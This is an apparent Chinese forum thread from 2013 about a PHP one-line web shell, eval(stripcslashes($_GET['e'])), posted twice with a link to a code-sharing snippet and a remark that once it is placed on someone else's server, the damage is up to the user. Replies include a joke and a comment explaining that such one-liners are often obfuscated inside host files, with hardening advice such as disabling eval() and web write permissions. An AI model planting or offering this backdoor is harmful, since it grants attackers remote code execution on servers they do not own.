放到别人服务器,攻击性的大小就由你自己决定了。
<?php
eval(stripcslashes($_GET['e']));
http://www.oschina.net/code/snippet_173183_13710
我看了笑了~~~
<?php
eval(stripcslashes($_GET['e']));
http://www.oschina.net/code/snippet_173183_13710
我看了笑了~~~

1 for4 Jan 2, 2013 笑点在哪里..~? |
3 tempdban Jan 2, 2013 via Android 确实啊写完楼都垮了 |
5 enj0y Jan 2, 2013 更多的做法是将一句话混淆隐藏在宿主PHP或者其它文件里,接受到事先备好的电话号指令后释放出来。防不胜防啊!想禁一句话,最好的办法是禁eval()和使用外部储存服务,然后关闭本地WEB写权限。 至于OSC上面的,烧主板、堵厕所嘛的,全是恶搞。 |